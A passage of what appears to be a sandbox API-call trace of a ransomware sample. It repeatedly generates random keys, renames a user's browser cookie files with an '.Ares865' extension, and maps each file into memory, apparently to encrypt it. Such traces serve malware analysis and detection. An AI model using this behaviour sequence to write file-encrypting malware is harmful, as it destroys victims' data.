CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.530] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.530] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.530] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.Ares865") returned 93 [0107.530] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.532] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102) returned 1 [0107.532] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.533] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.533] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.533] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x124 [0107.537] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0107.538] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.538] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.538] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.Ares865") returned 87 [0107.539] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.542] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93) returned 1 [0107.542] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.543] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.543] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.543] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x124 [0107.545] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0107.547] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.547] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.547] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.548] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.Ares865") returned 84 [0107.548] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.550] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=234) returned 1 [0107.551] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.551] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.551] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.552] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x124 [0107.554] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0107.555] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.555] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.555] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.556] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.Ares865") returned 83 [0107.556] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.558] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=578) returned 1 [0107.559] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.559] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.559] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.559] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x124 [0107.561] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0107.562] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.563] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.563] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.563] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.Ares865") returned 84 [0107.564] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.565] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101) returned 1 [0107.566] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.566] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.566] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.567] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x124 [0107.570] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0107.570] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.571] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.571] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.571] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.Ares865") returned 84 [0107.572] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.573] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82) returned 1 [0107.574] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.574] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.574] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.574] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x124 [0107.579] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0107.581] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.584] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.584] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.Ares865") returned 89 [0107.584] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.586] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=293) returned 1 [0107.587] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.587] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.587] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.587] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x124 [0107.590] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x190000 [0107.590] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.591] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.591] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.592] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.Ares865") returned 86 [0107.592] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0107.599] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.600] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x124 [0107.602] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0x190000 [0107.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.603] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.603] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.604] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.Ares865") returned 87 [0107.604] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=513) returned 1 [0107.606] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.606] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.606] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.607] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x124 [0107.609] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x190000 [0107.610] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.611] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.Ares865") returned 82 [0107.611] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.613] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=490) returned 1 [0107.614] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.614] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.614] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.614] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x124 [0107.616] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0x190000 [0107.617] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.618] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.618] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.Ares865") returned 84 [0107.618] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.620] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=456) returned 1 [0107.620] CryptAcquireContextW (in: phProv=0x2ccce54, 